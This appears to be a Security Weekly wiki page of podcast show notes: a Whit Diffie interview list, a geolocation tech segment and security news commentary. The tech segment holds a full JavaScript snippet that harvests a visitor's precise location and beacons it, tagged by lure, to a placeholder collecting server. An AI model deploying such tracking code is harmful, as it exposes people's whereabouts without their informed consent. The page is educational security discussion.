Difference between revisions of "Episode341"

From Security Weekly Wiki

Revision as of 20:09, 15 August 2013

Episode Media

[MP3 pt1]

[MP3 pt2]


PaulDotCom Security Weekly - Episode 339 for Thursday July 18th, 2013

  • We've released a book on Offensive Countermeasures! Visit tinyurl.com/OCM-Amazon to add this to your summer reading list.
  • We have a special webcast on Thursday August 22nd with Symantec titled "Fighting Malware: Taking Back The Endpoint". We are looking for sponsors for our September webcast. Contact mike -at- hacknaked.tv for details!
  • The Stogie Geeks Show! - Kick some ash with the Stogie Geeks, Thursday nights at 9:00PM EST. Come have a cigar with us! If you are in the Rhode Island area please visit our sponsor the Havana Cigar Club; it's an awesome place to have a drink! Make sure you print out your $5.00 off coupon here!

Interview: Dr. Whit Diffie


Dr. Diffie is a pioneer of public-key cryptography and was VP of Information Security and Cryptography at ICANN. He is co-author (with Susan Landau) of Privacy on the Line: The Politics of Wiretapping and Encryption.

  1. How did you get your start in information security?
  2. It seems like the security field is so broad and can be overwhelming. For people just starting in this industry, where should they focus their time and learning?
  3. What led you to start working on the problem that became public-key cryptography?
  4. Tell us about the genesis for your book and why you wrote it.
  5. Do you think privacy is dead? If not, how can we keep it alive?
  6. What is the Hummingbird algorithm and where would it be optimal?
  7. Are organizations doomed for failure when it comes to security for good, or do you think some day we will be in much better shape?
  8. What do you mean by "A secure internet could not serve our needs"?
  9. Why is crime essential to the internet?
  10. How do you think the internet will be different in 100 years?

Five Questions:

  • Three words to describe yourself
  • If you were a serial killer, what would be your weapon of choice?
  • In a game of ass grabby-grabby do you prefer to go first or second?
  • If you wrote a book about yourself, what would the title be?
  • Stranded on a desert island, which tablet would you bring with you if you could choose only one: Android, iPad or Surface?

Tech Segment: I Know Where You Live: Using Honeybadger by John Strand

[Paul: "I noticed we had not yet done a technical segment on this topic. There is some really cool technology and techniques for getting someone's location. Exploiting a function in the web browser yields great power!"]

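Paul's note above points at a browser function that gives away a visitor's position; the obvious one is the HTML5 Geolocation API, `navigator.geolocation`, which returns a fix only after the browser has prompted the user, so a tracking page has to handle denial and timeouts as well as success. The snippet below is an added example written for this page, not Honeybadger's own code or anything shown in the segment. The beacon URL is a placeholder, and the two stand-in `geolocation` objects are constructed so that both the granted and the denied paths can be exercised under Node without a browser.

```javascript
// Added example: harvest a visitor's location with the HTML5 Geolocation API and
// ship it to a collecting server. Runs in a page (real navigator.geolocation)
// or under Node with the constructed stand-ins at the bottom of this file.

// Placeholder collector; a real deployment points this at its own server.
const BEACON_URL = "https://example.invalid/hb/beacon";

const GEO_OPTIONS = {
  enableHighAccuracy: true, // ask for GPS / Wi-Fi positioning, not a coarse IP fix
  timeout: 10000,           // ms before the error callback fires with TIMEOUT (3)
  maximumAge: 0,            // refuse a cached fix
};

// Reduce a GeolocationPosition to the fields worth reporting.
function positionToRecord(position) {
  const c = position.coords;
  return {
    lat: c.latitude,
    lng: c.longitude,
    accuracy_m: c.accuracy,        // radius in metres; Wi-Fi fixes are tens of metres
    altitude_m: c.altitude ?? null, // null unless the device has an altitude source
    ts: position.timestamp,
  };
}

// GeolocationPositionError codes are fixed by the spec:
// 1 PERMISSION_DENIED, 2 POSITION_UNAVAILABLE, 3 TIMEOUT.
function errorToRecord(err) {
  const names = { 1: "permission_denied", 2: "position_unavailable", 3: "timeout" };
  return { error: names[err.code] || `code_${err.code}` };
}

// Wrap the callback API so the caller always gets exactly one record, whether
// the user granted, denied, the request timed out, or the API is missing.
function harvestLocation(geolocation, options = GEO_OPTIONS) {
  return new Promise((resolve) => {
    if (!geolocation) {
      resolve({ error: "geolocation_unsupported" });
      return;
    }
    geolocation.getCurrentPosition(
      (pos) => resolve(positionToRecord(pos)),
      (err) => resolve(errorToRecord(err)),
      options
    );
  });
}

// Put the record in the query string so a plain image request can carry it.
function beaconUrl(base, record, tag) {
  const url = new URL(base);
  url.searchParams.set("tag", tag); // identifies which lure the visitor hit
  for (const [k, v] of Object.entries(record)) url.searchParams.set(k, String(v));
  return url.toString();
}

// Constructed stand-ins for navigator.geolocation (not real browser objects).
const FAKE_GRANTED = {
  getCurrentPosition(ok) {
    ok({
      coords: { latitude: 41.824, longitude: -71.4128, accuracy: 25, altitude: null },
      timestamp: 1376000000000,
    });
  },
};
const FAKE_DENIED = {
  getCurrentPosition(_ok, fail) {
    fail({ code: 1, message: "User denied Geolocation" });
  },
};

// In a browser: prompt, build the beacon, fire it as an image load (no CORS
// preflight). Under Node: use the constructed stand-in and just return the URL.
async function run(tag) {
  const geo = typeof navigator !== "undefined" ? navigator.geolocation : FAKE_GRANTED;
  const record = await harvestLocation(geo);
  const url = beaconUrl(BEACON_URL, record, tag);
  if (typeof Image === "function") new Image().src = url; // browser only
  return url;
}

run("demo").then((url) => console.log(url));
```

The important design point is that every outcome, including a refused permission prompt, still produces a beacon: a denial is itself a data point (the visitor opened the page), and the `tag` ties the hit back to the lure that delivered it.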


Paul's Stories

  1. HP Integrated Lights-Out authentication bypass - I remember when I saw iLO for the first time. It was at a time when I had a great opportunity to work with a Windows admin who was building an environment from scratch. So, we were getting lots of servers. I was lucky, the admin really wanted to work with me and share knowledge. I looked at the iLO (RILO at the time) and was like "there is no way this is going anywhere else but on its own gated subnet". Fast forward 10 years, and the vulnerabilities are rampant, including this one. Dan Farmer and HD Moore are publishing huge amounts of research covering IPMI, the protocol being used by these systems. This is one case where I am a huge fan of putting it on a separate network (you get the added benefit of being truly out-of-band depending on how you implement it). I can't stress enough how important it is to keep these up-to-date with firmware too.
  2. 10 years of Blaster: a retrospective - Fantastic article from our friend Robert Graham. Lots of cool little stories and lessons to be learned here. He told the CEO he was taking over in the name of incident response. The vulnerability had exploits written in a matter of hours. It took weeks before there was a worm in the wild. The worm author copied broken code from the Internet (He posted a copy of the original code). Cool stuff.
  3. Buying Battles in the War on Twitter Spam - Great explanation of the Twitter underground. I find it interesting that no one wants to help solve the problem of email creation. Twitter relied on a unique email address, and evil people will use Hotmail (primarily) to create thousands of email accounts, then use a botnet to create the Twitter accounts, then sell them. They are used to spread malware, entice people to sites where ads make them money, and a few other malicious purposes. Comments on this article are funny, people that don't use Twitter still bash it. Don't knock it 'til you try it! Thing is, for Twitter to grow, they have to take a more aggressive stance on this sort of behavior. They are very "Apple like" when it comes to security problems, very hush hush from a social media network that is all about sharing information.
  4. Schneier on Security: Stories from MI5 - Don't use gerbils as a lie detector test on an airplane to find terrorists.
  5. Can We End CSRF With Header-Based Browser Policies?
  6. The More Things Change - The crux of the article (and this issue) is in this quote: "With all the new technology and the rapid growth of "mass market" cybercrime, it may be easy to overlook one constant: Malware depends on finding a way to install or run on its target without the user's informed consent. And, in 15 years in the industry, I've only seen three fundamental ways for that to happen: exploiting a vulnerability, compromising user credentials, and/or tricking the user. That's it. An entire generation's worth of malware -- tens of millions of variants -- reduced to three simple hacks." It couldn't be more true! Is there a product that can magically help us? No. Is it all the user's fault? Maybe. Can we do better? Yes. Big question is HOW?
  7. Hacker 'Shouts Abuse' Via Foscam Baby Monitoring Camera - This story just gets more messed up: Mr Gilbert said the voice directed offensive, sexualised words at their daughter Allyson, who was asleep in bed. The family believed the hacker was able to call the child by her name because it was spelt out on the bedroom's wall. Turns out the child is deaf. WTF? First, shame on you for picking on a two-year old. Second, you obviously do not have kids as you would know how much parents cherish peacefully sleeping children. Third, you are an asshole. Finally, Foscam and resellers need to do better on informing the consumer. If changing a password is that hard, you need to re-think the usability of your products.
  8. Leap Motion Controller exploit demoed by Malwarebytes - Install this, and move your hand to login to your computer. Awesome! I'd try to make it to that you need to pat your head and rub your belly at the same time to login. That would be fun.
  9. "Every employee is now an IT employee"
  10. Wall Of Sheep Hacker Group Exposes NFC's Risks
  11. "Mainframes Hackable"
  12. London Bans Smartphone Snooping Garbage Bins

Larry’s Stories

  1. Cam hacked… - [Larry] - So, can you really claim a default password that the user exposed directly to the internet a "hack", or a surprise for that matter? OMG over dramatized scary! But I suppose it takes that to get the word out, but this seems to make them afraid of the technology, not of ways to improve it. The vendor is being chastised for not being able to get patches to the device….uhhhh. And, oh, the irony. The "hacker" who spoke to the child with vulgarity through the camera? She didn't hear you because she's deaf.
  2. Transcend WiFi SD - [Larry] - Runs Linux. The smaller the device, the less emphasis on security? Could be, in that the web server is a mess: directory traversal, JavaScript, cleartext passwords, remote code execution, and priv escalation… all in an SD card.
  3. Kali via PXE - I know we had some folks on not that long ago talking about abusing PXE, and I'm also reminded about Dave Kennedy's tales of abusing PXE (if I recall correctly); now we can just go and abuse it to get access to a full featured hacking platform…
  4. NSA to cut 90% of its sysadmin roles - [Larry] - Why? Humans make mistakes, and by eliminating them, we can eliminate the leaks. Besides, we're going to move to a cloud based solution….because THAT's more secure...

Jack's Stories

  1. I'm sorry, really I am, but here it is anyway: the highlights (lowlights?) of the changes in PCI-DSS 3.0, https://www.pcisecuritystandards.org/documents/DSS_and_PA-DSS_Change_Highlights.pdf (link is to a 512k, 11-page PDF, because the PCI Council thinks you should trust PDFs).